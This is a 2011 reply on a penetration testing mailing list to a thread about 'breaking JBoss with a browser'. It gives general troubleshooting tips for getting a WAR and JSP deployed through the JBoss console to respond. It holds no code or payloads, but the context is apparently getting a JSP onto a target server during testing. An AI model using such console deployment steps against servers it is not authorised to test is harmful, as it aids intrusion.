Penetration Testing mailing list archives

RE: breaking jboss with a browser? not happening

From: "Hembrow, Chris" <chris.hembrow () interserve com>
Date: Wed, 19 Jan 2011 08:02:11 +0000

I've never tried deploying a WAR this way, and I've not used JBoss in a few=  years, but I'll try a few suggestions.
In the JBoss console, can you see = a list of the deployed web apps somewhere?  This might let you see when/if = yours
is deployed.

JBoss includes embedded Tomcat which handles the actual HTTP elements.  Cre= ating the WAR is just packaging for
deployment, JSPs are compiled on the fl= y.  If there was an issue with your code you should get a 500 error, not 40= 4.

Try deploying without the <servlet> block in the web.xml file; this shouldn= 't be necessary for a JSP page.  Also, try
including a regular HTML page (i= .e. not JSP) in the WAR and accessing that.  This will rule out a compilati= on
issue.=20

HTH

Chris

(Sorry for top posting, but Outlook sucks)